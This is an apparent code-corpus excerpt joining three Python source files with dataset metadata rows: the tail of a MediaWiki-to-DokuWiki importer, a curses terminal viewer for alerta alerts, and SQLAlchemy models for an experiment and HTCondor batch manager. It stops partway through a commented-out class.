Licensed under New BSD License as described in the file LICENSE.
"""
from __future__ import print_function, unicode_literals, absolute_import, division
import simplemediawiki, simplejson
import re
from pprint import pprint
class Importer(object):
def __init__(self, api_url, http_user=None, http_pass="", wiki_user=None, wiki_pass="", wiki_domain=None, verbose=False):
self.verbose = verbose
if wiki_domain:
self.mw = simplemediawiki.MediaWiki(api_url, http_user=http_user, http_password=http_pass, domain=wiki_domain)
else:
self.mw = simplemediawiki.MediaWiki(api_url, http_user=http_user, http_password=http_pass)
# login if necessary
if wiki_user is not None:
print("Logging in as %s..." % wiki_user)
if not self.mw.login(wiki_user, wiki_pass):
raise RuntimeError("Mediawiki login failed. Wrong credentials?")
# version check
try:
self.need_rawcontinue = False
generator = "".join(self._query({'meta' : 'siteinfo'}, ['general', 'generator']))
version = [ int(x) for x in re.search(r'[0-9.]+', generator).group(0).split(".") ] # list of [ 1, 19, 1 ] or similar
if version[0] == 1 and version[1] < 13:
raise RuntimeError("Mediawiki version is too old. Yamdwe requires 1.13 or newer. This install is %s" % generator)
# check if the version is too old for the 'rawcontinue' parameter
# see https://www.mediawiki.org/wiki/API:Query#Backwards_compatibility_of_continue
self.need_rawcontinue = version[0] > 1 or (version[0] == 1 and version[1] >= 24)
print("%s meets version requirements." % generator)
except IndexError:
raise RuntimeError("Failed to read Mediawiki siteinfo/generator. Is version older than 1.8? Yamdwe requires 1.13 or greater.")
def verbose_print(self, msg):
if self.verbose:
print(msg)
def get_all_pages(self):
"""
Slurp all pages down from the mediawiki instance, together with all revisions including content.
WARNING: Hits API hard, don't do this without knowledge/permission of wiki operator!!
"""
query = {'list' : 'allpages'}
print("Getting list of pages...")
pages = self._query(query, [ 'allpages' ])
self.verbose_print("Got %d pages." % len(pages))
print("Query page revisions (this may take a while)...")
for page in pages:
self.verbose_print("Querying revisions for pageid %s (%s)..." % (page['pageid'], page['title']))
page["revisions"] = self._get_revisions(page)
self.verbose_print("Got %d revisions." % len(page["revisions"]))
return pages
def _get_revisions(self, page):
pageid = page['pageid']
query = { 'prop' : 'revisions',
'pageids' : pageid,
'rvprop' : 'timestamp|user|comment|content',
'rvlimit' : '5',
}
revisions = self._query(query, [ 'pages', str(pageid), 'revisions' ])
return revisions
def get_all_images(self):
"""
Slurp all images down from the mediawiki instance, latest revision of each image, only.
WARNING: Hits API hard, don't do this without knowledge/permission of wiki operator!!
"""
query = {'list' : 'allimages'}
return self._query(query, [ 'allimages' ])
def get_all_users(self):
"""
Slurp down all usernames from the mediawiki instance.
"""
query = {'list' : 'allusers'}
return self._query(query, [ 'allusers' ])
def _query(self, args, path_to_result):
"""
Make a Mediawiki API query that results a list of results,
handle the possibility of making a paginated query using query-continue
"""
query = { 'action' : 'query' }
if self.need_rawcontinue:
query["rawcontinue"] = ""
query.update(args)
result = []
continuations = 0
while True:
try:
response = self.mw.call(query)
except simplejson.scanner.JSONDecodeError as e:
if e.pos == 0:
if not self.verbose:
raise RuntimeError("Mediawiki gave us back a non-JSON response. You may need to double-check the Mediawiki API URL you are providing (it usually ends in api.php), and also your Mediawiki permissions. To see the response content, pass the --verbose flag to yamdwe.")
else:
raise RuntimeError("Mediawiki gave us back a non-JSON response:\n\n\nInvalid response follows (%d bytes):\n%s\n\n(End of content)\nFailed to parse. You may need to double-check the Mediawiki API URL you are providing (it usually ends in api.php), and also your Mediawiki permissions." % (len(e.doc), e.doc.decode("utf-8")))
raise
# fish around in the response for our actual data (location depends on query)
try:
inner = response['query']
for key in path_to_result:
inner = inner[key]
except KeyError:
raise RuntimeError("Mediawiki query '%s' returned unexpected response '%s' after %d continuations" % (args, response, continuations))
result += inner
# if there's a warning print it out (shouldn't need a debug flag since this is of interest to any user)
if 'warnings' in response:
for warnkey in response['warnings']:
print("WARNING: %s function throws the warning %s" % (warnkey, response['warnings'][warnkey]['*']))
# if there's a continuation, find the new arguments and follow them
try:
query.update(response['query-continue'][path_to_result[-1]])
continuations += 1
except KeyError:
return result
def get_file_namespaces(self):
"""
Return a tuple. First entry is the name used by default for the file namespace (which dokuwiki will also use.)
Second entry is a list of all aliases used for that namespace, and aliases used for the 'media' namespace.
"""
query = { 'action' : 'query', 'meta' : 'siteinfo', 'siprop' : 'namespaces|namespacealiases' }
result = self.mw.call(query)['query']
namespaces = result['namespaces'].values()
aliases = result.get('namespacealiases', {})
file_namespace = {'*' : 'Files', 'canonical' : 'File'}
media_namespace = {'*' : 'Media', 'canonical' : 'Media'}
# search for the File namespace
for namespace in namespaces:
if namespace.get('canonical', None) == 'File':
file_namespace = namespace
elif namespace.get('canonical', None) == 'Media':
media_namespace = namespace
# alias list starts with the file & media namespace canonical values, and the media "real" value
aliases_result = [ file_namespace['canonical'], media_namespace['canonical'], media_namespace['*'] ]
# look for any aliases by searching the file namespace id, add to the list
ids = [ file_namespace.get('id', None), media_namespace.get('id', None) ]
for alias in aliases:
if alias['id'] in ids:
aliases_result.append(alias['*'])
return file_namespace['*'], aliases_result
def get_main_pagetitle(self):
"""
Return the title of the main Mediawiki page
"""
query = { 'action' : 'query', 'meta' : 'siteinfo', 'siprop' : 'general' }
result = self.mw.call(query)['query']
return result['general'].get("mainpage", "Main")
|
bsd-3-clause
| 6,800,407,379,736,151,000
| 48.465839
| 345
| 0.596936
| false
| 4.200422
| false
| false
| false
|
alerta/python-alerta-client
|
alertaclient/top.py
|
1
|
5079
|
import curses
import sys
import time
from curses import wrapper
from datetime import datetime
from alertaclient.models.alert import Alert
from alertaclient.utils import DateTime
class Screen:
ALIGN_RIGHT = 'R'
ALIGN_CENTRE = 'C'
def __init__(self, client, timezone):
self.client = client
self.timezone = timezone
self.screen = None
self.lines = None
self.cols = None
def run(self):
wrapper(self.main)
def main(self, stdscr):
self.screen = stdscr
curses.use_default_colors()
curses.init_pair(1, curses.COLOR_RED, -1)
curses.init_pair(2, curses.COLOR_MAGENTA, -1)
curses.init_pair(3, curses.COLOR_YELLOW, -1)
curses.init_pair(4, curses.COLOR_BLUE, -1)
curses.init_pair(5, curses.COLOR_CYAN, -1)
curses.init_pair(6, curses.COLOR_GREEN, -1)
curses.init_pair(7, curses.COLOR_WHITE, curses.COLOR_BLACK)
COLOR_RED = curses.color_pair(1)
COLOR_MAGENTA = curses.color_pair(2)
COLOR_YELLOW = curses.color_pair(3)
COLOR_BLUE = curses.color_pair(4)
COLOR_CYAN = curses.color_pair(5)
COLOR_GREEN = curses.color_pair(6)
COLOR_BLACK = curses.color_pair(7)
self.SEVERITY_MAP = {
'security': ['Sec', COLOR_BLACK],
'critical': ['Crit', COLOR_RED],
'major': ['Majr', COLOR_MAGENTA],
'minor': ['Minr', COLOR_YELLOW],
'warning': ['Warn', COLOR_BLUE],
'indeterminate': ['Ind ', COLOR_CYAN],
'cleared': ['Clr', COLOR_GREEN],
'normal': ['Norm', COLOR_GREEN],
'ok': ['Ok', COLOR_GREEN],
'informational': ['Info', COLOR_GREEN],
'debug': ['Dbug', COLOR_BLACK],
'trace': ['Trce', COLOR_BLACK],
'unknown': ['Unkn', COLOR_BLACK]
}
self.screen.keypad(1)
self.screen.nodelay(1)
while True:
self.update()
event = self.screen.getch()
if 0 < event < 256:
self._key_press(chr(event))
else:
if event == curses.KEY_RESIZE:
self.update()
time.sleep(2)
def update(self):
self.lines, self.cols = self.screen.getmaxyx()
self.screen.clear()
now = datetime.utcnow()
status = self.client.mgmt_status()
version = status['version']
# draw header
self._addstr(0, 0, self.client.endpoint, curses.A_BOLD)
self._addstr(0, 'C', f'alerta {version}', curses.A_BOLD)
self._addstr(0, 'R', '{}'.format(now.strftime('%H:%M:%S %d/%m/%y')), curses.A_BOLD)
# TODO - draw bars
# draw alerts
text_width = self.cols - 95 if self.cols >= 95 else 0
self._addstr(2, 1, 'Sev. Time Dupl. Customer Env. Service Resource Group Event'
+ ' Value Text' + ' ' * (text_width - 4), curses.A_UNDERLINE)
def short_sev(severity):
return self.SEVERITY_MAP.get(severity, self.SEVERITY_MAP['unknown'])[0]
def color(severity):
return self.SEVERITY_MAP.get(severity, self.SEVERITY_MAP['unknown'])[1]
r = self.client.http.get('/alerts')
alerts = [Alert.parse(a) for a in r['alerts']]
last_time = DateTime.parse(r['lastTime'])
for i, alert in enumerate(alerts):
row = i + 3
if row >= self.lines - 2: # leave room for footer
break
text = '{:<4} {} {:5d} {:8.8} {:<12} {:<12} {:<12.12} {:5.5} {:<12.12} {:<5.5} {:.{width}}'.format(
short_sev(alert.severity),
DateTime.localtime(alert.last_receive_time, self.timezone, fmt='%H:%M:%S'),
alert.duplicate_count,
alert.customer or '-',
alert.environment,
','.join(alert.service),
alert.resource,
alert.group,
alert.event,
alert.value or 'n/a',
alert.text,
width=text_width
)
# XXX - needed to support python2 and python3
if not isinstance(text, str):
text = text.encode('ascii', errors='replace')
self._addstr(row, 1, text, color(alert.severity))
# draw footer
self._addstr(self.lines - 1, 0, 'Last Update: {}'.format(last_time.strftime('%H:%M:%S')), curses.A_BOLD)
self._addstr(self.lines - 1, 'C', '{} - {}'.format(r['status'], r.get('message', 'no errors')), curses.A_BOLD)
self._addstr(self.lines - 1, 'R', 'Count: {}'.format(r['total']), curses.A_BOLD)
self.screen.refresh()
def _addstr(self, y, x, line, attr=0):
if x == self.ALIGN_RIGHT:
x = self.cols - len(line) - 1
if x == self.ALIGN_CENTRE:
x = int((self.cols / 2) - len(line) / 2)
self.screen.addstr(y, x, line, attr)
def _key_press(self, key):
if key in 'qQ':
sys.exit(0)
|
apache-2.0
| 1,558,769,885,894,008,600
| 33.087248
| 118
| 0.525103
| false
| 3.476386
| false
| false
| false
|
ikinsella/squall
|
flaskapp/squall/models.py
|
1
|
32913
|
import os
import shutil
import json
import yaml
import zipfile
import re
from flask import (render_template, current_app)
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.login import (UserMixin, AnonymousUserMixin)
from werkzeug.security import (generate_password_hash, check_password_hash)
from sqlalchemy.ext.hybrid import hybrid_property
from flask.ext.pymongo import PyMongo
db = SQLAlchemy()
mongo = PyMongo()
""" Tables For Many To Many Relationships """
""" TODO : Multi-User
users_tags = db.Table(
'users_tags',
db.Column('user_id', db.Integer, db.ForeignKey('user.id')),
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')))
"""
algorithms_experiments = db.Table(
'algorithms_experiments',
db.Column('experiment_id', db.Integer, db.ForeignKey('experiment.id')),
db.Column('algorithm_id', db.Integer, db.ForeignKey('algorithm.id')))
algorithms_tags = db.Table(
'algorithms_tags',
db.Column('algorithm_id', db.Integer, db.ForeignKey('algorithm.id')),
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')))
implementations_tags = db.Table(
'implementations_tags',
db.Column('implementation_id', db.Integer,
db.ForeignKey('implementation.id')),
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')))
collections_experiments = db.Table(
'collections_experiments',
db.Column('experiment_id', db.Integer, db.ForeignKey('experiment.id')),
db.Column('collection_id', db.Integer,
db.ForeignKey('data_collection.id')))
collections_tags = db.Table(
'collections_tags',
db.Column('data_collection_id', db.Integer,
db.ForeignKey('data_collection.id')),
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')))
data_sets_tags = db.Table(
'data_sets_tags',
db.Column('data_set_id', db.Integer, db.ForeignKey('data_set.id')),
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')))
experiments_tags = db.Table(
'experiments_tags',
db.Column('experiment_id', db.Integer, db.ForeignKey('experiment.id')),
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')))
batches_tags = db.Table(
'batches_tags',
db.Column('batch_id', db.Integer, db.ForeignKey('batch.id')),
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')))
""" Entities """
class User(db.Model, UserMixin):
"""Represents a single User who has access to the application"""
# Fields
id = db.Column(db.Integer(), primary_key=True)
_launch_directory = db.Column(db.String(128))
username = db.Column(db.String(64))
password = db.Column(db.String(64))
""" TODO: Multi-User
_tags = db.relationship('Tag', secondary=users_tags,
backref=db.backref('users',
lazy='dynamic'))
"""
# relationships
""" TODO: Multi-User
algorithms = db.relationship()
datacollections = db.relationship()
experiments = db.relationship()
batches = db.relationship()
tags = db.relationship()
"""
def __init__(self, username, launch_directory, password):
self.username = username
self._launch_directory = launch_directory
self.set_password(password)
def __repr__(self):
return '<User {username}>'.format(username=self.username)
def set_password(self, password):
self.password = generate_password_hash(password)
def check_password(self, value):
return check_password_hash(self.password, value)
def get_id(self):
return unicode(self.id)
@property
def is_authenticated(self):
if isinstance(self, AnonymousUserMixin):
return False
else:
return True
@property
def is_active(self):
return True
@property
def is_anonymous(self):
if isinstance(self, AnonymousUserMixin):
return True
else:
return False
@hybrid_property
def launch_directory(self):
return self._launch_directory
@launch_directory.setter
def launch_directory(self, value):
self._launch_directory = value
class Tag(db.Model):
"""Represents a tag which is used to add query-able meta data
to experiments, batches, data collections, data sets, algorithms,
and implementations. A User defines tags in a view and each collected
job is associated with all the tags contained in its hierarchy."""
# Fields
id = db.Column(db.Integer, primary_key=True)
_name = db.Column(db.String(64), index=True, unique=True)
# Relationships
""" TODO: Multi-User
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
"""
def __init__(self, name):
super(Tag, self).__init__()
self._name = name
@hybrid_property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
class Algorithm(db.Model):
""" Entity representing a single algorithm used in a an experiment """
# Fields
id = db.Column(db.Integer, primary_key=True)
_name = db.Column(db.String(64), index=True, unique=True)
_description = db.Column(db.String(512), index=False, unique=False)
# Relationships
""" TODO: Multi-User
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
"""
_tags = db.relationship('Tag', secondary=algorithms_tags,
backref=db.backref('algorithms', lazy='dynamic'))
_implementations = db.relationship('Implementation', backref='algorithm',
lazy='dynamic')
def __init__(self, name, description, tags):
self._name = name
self._description = description
self._tags = tags
@hybrid_property
def serialize(self):
return {'Name': self.name,
'Tags': [tag.name for tag in self.tags]}
@hybrid_property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@hybrid_property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@hybrid_property
def tags(self):
return self._tags
@tags.setter
def tags(self, value):
self._tags.append(value)
@hybrid_property
def implementations(self):
return self._implementations
@implementations.setter
def implementations(self, value):
self._implementations.append(value)
class Implementation(db.Model):
"""Represents a single implementation of an algorithm"""
# Fields
id = db.Column(db.Integer, primary_key=True)
_name = db.Column(db.String(64), index=True, unique=True)
_description = db.Column(db.String(512), index=False, unique=False)
_setup_scripts = db.Column(db.PickleType(), index=False, unique=False)
_executable = db.Column(db.String(64), index=False, unique=False)
# Relationships
_algorithm_id = db.Column(db.Integer, db.ForeignKey('algorithm.id'))
""" TODO: Multi-User
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
"""
_tags = db.relationship('Tag', secondary=implementations_tags,
backref=db.backref('implementations',
lazy='dynamic'))
_urls = db.relationship('URL', backref='implementation', lazy='select')
_batches = db.relationship('Batch', backref='implementation',
lazy='dynamic')
""" TODO: Parameter Validation
_arguments = db.relationship('Argument',
backref='implementation',
lazy='dynamic')
"""
def __init__(self,
algorithm_id,
name,
description,
tags,
urls,
setup_scripts,
executable):
self._algorithm_id = algorithm_id
self._name = name
self._description = description
self._tags = tags
self._urls = [URL(url, implementation_id=self.id) for url in urls]
self._setup_scripts = setup_scripts
self._executable = executable
# self._arguments = arguments # TODO: Parameter Validation
@hybrid_property
def serialize(self):
return {'Name': self.name,
'Tags': [tag.name for tag in self.tags]}
@hybrid_property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@hybrid_property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@hybrid_property
def tags(self):
return self._tags
@tags.setter
def tags(self, value):
self._tags.append(value)
@hybrid_property
def urls(self):
return [url.url for url in self._urls]
@urls.setter
def urls(self, value):
self._urls.append(URL(value, implementation_id=self.id))
@hybrid_property
def setup_scripts(self):
return self._setup_scripts
@setup_scripts.setter
def setup_scripts(self, value):
self._setup_scripts.append(value)
@hybrid_property
def executable(self):
return self._executable
@executable.setter
def executable(self, value):
self._executable = value
@hybrid_property
def batches(self):
return self._batches
@batches.setter
def batches(self, value):
self._batches.append(value)
""" TODO: Parameter Validation
@hybrid_property
def arguments(self):
return self._arguments
@arguments.setter
def arguments(self, value):
self._arguments.append(value)
"""
class DataCollection(db.Model):
"""Represents a collection of datasets derived from a common source"""
# Fields
id = db.Column(db.Integer, primary_key=True)
_name = db.Column(db.String(64), index=True, unique=True)
_description = db.Column(db.String(512), index=False, unique=False)
# Relationships
""" TODO: Moving To Multi-User
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
"""
_tags = db.relationship('Tag', secondary=collections_tags,
backref=db.backref('data_collections',
lazy='dynamic'))
_data_sets = db.relationship('DataSet', backref='data_collection',
lazy='dynamic')
def __init__(self, name, description, tags):
super(DataCollection, self).__init__()
self._name = name
self._description = description
self._tags = tags
@hybrid_property
def serialize(self):
return {'Name': self.name,
'Tags': [tag.name for tag in self.tags]}
@hybrid_property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@hybrid_property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@hybrid_property
def tags(self):
return self._tags
@tags.setter
def tags(self, value):
self._tags.append(value)
@hybrid_property
def data_sets(self):
return self._data_sets
@data_sets.setter
def data_sets(self, value):
self._data_sets.append(value)
class DataSet(db.Model):
"""Represents a single dataset belonging to a data collection"""
# Fields
id = db.Column(db.Integer, primary_key=True)
_name = db.Column(db.String(64), index=True, unique=True)
_description = db.Column(db.String(512), index=False, unique=False)
# Relationships
""" TODO: Moving To Multi-User
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
"""
data_collection_id = db.Column(
db.Integer, db.ForeignKey('data_collection.id'))
_tags = db.relationship('Tag', secondary=data_sets_tags,
backref=db.backref('data_sets', lazy='dynamic'))
_urls = db.relationship('URL', backref='data_set', lazy='select')
_batches = db.relationship('Batch', backref='data_set', lazy='dynamic')
def __init__(self, data_collection_id, name, description, tags, urls):
super(DataSet, self).__init__()
self.data_collection_id = data_collection_id
self._name = name
self._description = description
self._tags = tags
self._urls = [URL(url, data_set_id=self.id) for url in urls]
@hybrid_property
def serialize(self):
return {'Name': self.name,
'Tags': [tag.name for tag in self.tags]}
@hybrid_property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@hybrid_property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@hybrid_property
def tags(self):
return self._tags
@tags.setter
def tags(self, value):
self._tags.append(value)
@hybrid_property
def urls(self):
return [url.url for url in self._urls]
@urls.setter
def urls(self, value):
self._urls.append(URL(value, data_set_id=self.id))
@hybrid_property
def batches(self):
return self._batches
@batches.setter
def batches(self, value):
self._batches.append(value)
class Experiment(db.Model):
"""Represents an experiment composed of data collections and algorithms"""
# Fields
id = db.Column(db.Integer, primary_key=True)
_name = db.Column(db.String(64), index=True, unique=True)
_description = db.Column(db.String(512), index=False, unique=False)
# Relationships
"""
Moving To Multi-User TODO:
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
"""
_tags = db.relationship('Tag', secondary=experiments_tags,
backref=db.backref('experiments', lazy='dynamic'))
_algorithms = db.relationship('Algorithm',
secondary=algorithms_experiments,
backref=db.backref('experiments',
lazy='dynamic'))
_collections = db.relationship('DataCollection',
secondary=collections_experiments,
backref=db.backref('experiments',
lazy='dynamic'))
_batches = db.relationship('Batch', backref='experiment', lazy='dynamic')
def __init__(self, name, description, tags, algorithms, collections):
super(Experiment, self).__init__()
self._name = name
self._description = description
self._tags = tags
self._algorithms = algorithms
self._collections = collections
@hybrid_property
def serialize(self):
return {'Name': self.name,
'Tags': [tag.name for tag in self.tags]}
@hybrid_property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@hybrid_property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@hybrid_property
def tags(self):
return self._tags
@tags.setter
def tags(self, value):
self._tags.append(value)
@hybrid_property
def algorithms(self):
return self._algorithms
@algorithms.setter
def algorithms(self, value):
self._algorithms.append(value)
@hybrid_property
def collections(self):
return self._collections
@collections.setter
def collections(self, value):
self._collections.append(value)
@hybrid_property
def batches(self):
return self._batches
@batches.setter
def batches(self, value):
self._batches.append(value)
class Batch(db.Model):
"""Represents a batch of jobs to be deployed on HTCondor"""
# Fields
id = db.Column(db.Integer, primary_key=True)
_name = db.Column(db.String(64), index=True, unique=True)
_description = db.Column(db.String(512), index=False, unique=False)
_params = db.Column(db.PickleType(), index=False, unique=False)
_memory = db.Column(db.Integer, index=False, unique=False)
_disk = db.Column(db.Integer, index=False, unique=False)
_flock = db.Column(db.Boolean(), index=False)
_glide = db.Column(db.Boolean(), index=False)
_arguments = db.Column(db.PickleType(), index=False, unique=False)
_kwargs = db.Column(db.PickleType(), index=False, unique=False)
_sweep = db.Column(db.String(64), index=False, unique=False)
_wrapper = db.Column(db.String(64), index=False, unique=False)
_submit_file = db.Column(db.String(64), index=False, unique=False)
_params_file = db.Column(db.String(64), index=False, unique=False)
_share_dir = db.Column(db.String(64), index=False, unique=False)
_results_dir = db.Column(db.String(64), index=False, unique=False)
_pre = db.Column(db.String(64), index=False, unique=False)
_post = db.Column(db.String(64), index=False, unique=False)
_job_pre = db.Column(db.String(64), index=False, unique=False)
_job_post = db.Column(db.String(64), index=False, unique=False)
_completed = db.Column(db.Boolean(), index=False)
# Relationships
""" TODO: Multi-User
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
"""
experiment_id = db.Column(db.Integer, db.ForeignKey('experiment.id'))
data_set_id = db.Column(db.Integer, db.ForeignKey('data_set.id'))
implementation_id = db.Column(db.Integer,
db.ForeignKey('implementation.id'))
_tags = db.relationship('Tag', secondary=batches_tags,
backref=db.backref('batches', lazy='dynamic'))
_jobs = db.relationship('Job', backref='batch', lazy='select')
def __init__(self,
experiment_id,
data_set_id,
implementation_id,
name,
description,
tags,
params,
memory,
disk,
flock,
glide,
arguments=None,
keyword_arguments=None,
sweep='sweep.dag',
wrapper='wrapper.sh',
submit_file='process.sub',
params_file='params.json',
share_directory='share',
results_directory='results',
pre_script=None,
job_pre_script=None,
post_script='batch_post.py',
job_post_script='job_post.py'):
super(Batch, self).__init__()
# Relationships
self.experiment_id = experiment_id
self.data_set_id = data_set_id
self.implementation_id = implementation_id
# Mandatory
self._name = name
self._description = description
self._tags = tags
self._params = params
self._jobs = [Job(batch_id=self.id, uid=uid, params=job_params)
for uid, job_params in enumerate(params)]
self._memory = memory
self._disk = disk
self._flock = flock
self._glide = glide
# Optional Arguments
self._pre = pre_script
self._post = post_script
self._job_pre = job_pre_script
self._job_post = job_post_script
self._arguments = arguments
self._kwargs = keyword_arguments
self._sweep = sweep
self._wrapper = wrapper
self._submit_file = submit_file
self._params_file = params_file
self._share_dir = share_directory
self._results_dir = results_directory
self._completed = False
def package(self): # TODO: Remove after, replace zip if exists,
"""Packages the files to run a batch of jobs into a directory"""
rootdir = makedir(
os.path.join(current_app.config['STAGING_AREA'], self.safe_name))
makedir(os.path.join(rootdir, self.results_dir))
sharedir = makedir(os.path.join(rootdir, self.share_dir))
self.write_template('sweep', os.path.join(rootdir, self.sweep))
self.write_params(rootdir)
self.write_template('wrapper', os.path.join(sharedir, self.wrapper))
for job in self.jobs: # Setup Job Directories
job.package(rootdir)
# self.write_template('batch_pre', os.path.join(sharedir, self.pre))
self.write_template('batch_post', os.path.join(sharedir, self.post))
# self.write_template('job_pre', os.path.join(sharedir, self.job_pre))
self.write_template('job_post', os.path.join(sharedir, self.job_post))
self.write_template('hack', os.path.join(sharedir, 'hack.sub'))
shutil.copy(os.path.join(current_app.config['STAGING_AREA'], 'hack'),
sharedir) # Copy fragile hack executable to share_dir
zipfile = rootdir + '.zip'
make_zipfile(zipfile, rootdir)
shutil.rmtree(rootdir) # clean up for next package
return os.path.basename(zipfile)
def write_params(self, rootdir):
""" Writes a dictionary to a json file """
filename = os.path.join(rootdir, self.params_file)
with open(filename, 'w') as writefile:
json.dump(self.params, writefile, sort_keys=True, indent=4)
def write_template(self, template, filename):
""" Renders a batch level tempalte and writes it to filename """
if filename:
with open(filename, 'w') as writefile:
writefile.write(render_template(template, batch=self))
@hybrid_property
def serialize(self):
return {'Name': self.name,
'Tags': [tag.name for tag in self.tags]}
@hybrid_property
def mongoize(self):
imp = Implementation.query.filter_by(id=self.implementation_id).first()
exp = Experiment.query.filter_by(id=self.experiment_id).first()
ds = DataSet.query.filter_by(id=self.data_set_id).first()
dc = DataCollection.query.filter_by(id=ds.data_collection_id).first()
alg = Algorithm.query.filter_by(id=imp._algorithm_id).first()
return {'Batch': self.serialize,
'Tags': [tag.name for tag in self.tags], # TODO: conglomerate
'Experiment': exp.serialize,
'DataSet': ds.serialize,
'DataCollection': dc.serialize,
'Algorithm': alg.serialize,
'Implementation': imp.serialize}
@hybrid_property
def safe_name(self):
"""Remove non-word characters & replace whitespace with underscore"""
return re.sub(r"\s+", '_', re.sub(r"[^\w\s]", '', self.name))
@hybrid_property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@hybrid_property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@hybrid_property
def tags(self):
return self._tags
@tags.setter
def tags(self, value):
self._tags.append(value)
@hybrid_property
def jobs(self):
return self._jobs
@jobs.setter
def jobs(self, value):
self._jobs.append(value)
@hybrid_property
def params(self):
return self._params
@params.setter
def params(self, value):
self._params = yaml.load(value) # TODO: Validate
@hybrid_property
def memory(self):
return self._memory
@memory.setter
def memory(self, value):
self._memory = value
@hybrid_property
def disk(self):
return self._disk
@disk.setter
def disk(self, value):
self._disk = value
@hybrid_property
def flock(self):
return self._flock
@flock.setter
def flock(self, value):
self._flock = value
@hybrid_property
def glide(self):
return self._glide
@hybrid_property
def pre(self):
return self._pre
@pre.setter
def pre(self, value):
self._pre = value
@hybrid_property
def post(self):
return self._post
@post.setter
def post(self, value):
self._post = value
@hybrid_property
def job_pre(self):
return self._job_pre
@job_pre.setter
def job_pre(self, value):
self._job_pre = value
@hybrid_property
def job_post(self):
return self._job_post
@job_post.setter
def job_post(self, value):
self._job_post = value
@hybrid_property
def args(self):
return self._arguments
@args.setter
def args(self, value):
self._arguments = value
@hybrid_property
def kwargs(self):
return self._kwargs
@kwargs.setter
def kwargs(self, value):
self._kwargs = value
@hybrid_property
def sweep(self):
return self._sweep
@sweep.setter
def sweep(self, value):
self._sweep = value
@hybrid_property
def wrapper(self):
return self._wrapper
@wrapper.setter
def wrapper(self, value):
self._wrapper = value
@hybrid_property
def submit_file(self):
return self._submit_file
@submit_file.setter
def submit_file(self, value):
self._submit_file = value
@hybrid_property
def params_file(self):
return self._params_file
@params_file.setter
def params_file(self, value):
self._params_file = value
@hybrid_property
def share_dir(self):
return self._share_dir
@share_dir.setter
def share_dir(self, value):
self._share_dir = value
@hybrid_property
def results_dir(self):
return self._results_dir
@results_dir.setter
def results_dir(self, value):
self._results_dir = value
@hybrid_property
def size(self):
return len(self._jobs)
@hybrid_property
def completed(self):
return self._completed
@completed.setter
def completed(self, value):
self._completed = value
class Job(db.Model):
"""Represents a single job, belonging to a Batch"""
# Fields
id = db.Column(db.Integer, primary_key=True)
_uid = db.Column(db.Integer, index=True, unique=False)
_params = db.Column(db.PickleType(), index=True, unique=False)
# Relationships
batch_id = db.Column(db.Integer, db.ForeignKey('batch.id'))
""" TODO: Multi-User
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
"""
def __init__(self, batch_id, uid, params):
super(Job, self).__init__()
self.batch_id = batch_id
self._uid = uid
self._params = params
def package(self, rootdir):
"""Packages files to run a job into a directory in rootdir"""
jobdir = makedir(os.path.join(rootdir, self.uid))
self.write_params(jobdir)
self.write_template('process', os.path.join(jobdir, self.submit_file))
self.write_template('subdag', os.path.join(jobdir, self.subdag))
def write_params(self, jobdir):
""" Writes a dictionary to a json file """
filename = os.path.join(jobdir, self.params_file)
with open(filename, 'w') as writefile:
json.dump(self.params, writefile, sort_keys=True, indent=4)
def write_template(self, template, filename):
""" Renders a batch level tempalte and writes it to filename """
if filename:
with open(filename, 'w') as writefile:
writefile.write(render_template(template, job=self))
@hybrid_property
def uid(self):
return str(self._uid).zfill(len(str(self.batch.size-1)))
@uid.setter
def uid(self, value):
self._uid = value
@hybrid_property
def params(self):
return self._params
@params.setter
def params(self, value):
self._params = value
@hybrid_property
def params_file(self):
return self.batch.params_file
@hybrid_property
def memory(self):
return self.batch.memory
@hybrid_property
def disk(self):
return self.batch.disk
@hybrid_property
def flock(self):
return self.batch.flock
@hybrid_property
def glide(self):
return self.batch.glide
@hybrid_property
def args(self):
return self.batch.args
@hybrid_property
def kwargs(self):
return self.batch.kwargs
@hybrid_property
def wrapper(self):
return self.batch.wrapper
@hybrid_property
def submit_file(self):
return self.batch.submit_file
@hybrid_property
def subdag(self):
return self.uid + '.dag'
@hybrid_property
def share_dir(self):
return self.batch.share_dir
@hybrid_property
def results_dir(self):
return self.batch.results_dir
@hybrid_property
def pre(self):
return self.batch.job_pre
@hybrid_property
def post(self):
return self.batch.job_post
@hybrid_property
def batch_name(self):
return self.batch.safe_name
@hybrid_property
def tags(self):
return self.batch.tags
""" TODO: Parameter Validation
class Argument(db.Model):
Entity representing a single valid argument
belonging to an implementation of an algorithm
# Fields
id = db.Column(db.Integer,
primary_key=True)
_name = db.Column(db.String(64),
index=True,
unique=True)
_data_type = db.Column(db.Enum('int', 'float', 'string', 'enum'),
index=True,
unique=False)
_optional = db.Column(db.Boolean(),
index=True)
# Relationships
implementation_id = db.Column(db.Integer,
db.ForeignKey('implementation.id'))
def __init__(self, implementation_id, name, data_type, optional):
super(Argument, self).__init__()
self.implementation_id = implementation_id
self._name = name
self._data_type = data_type
self._optional = optional
@hybrid_property
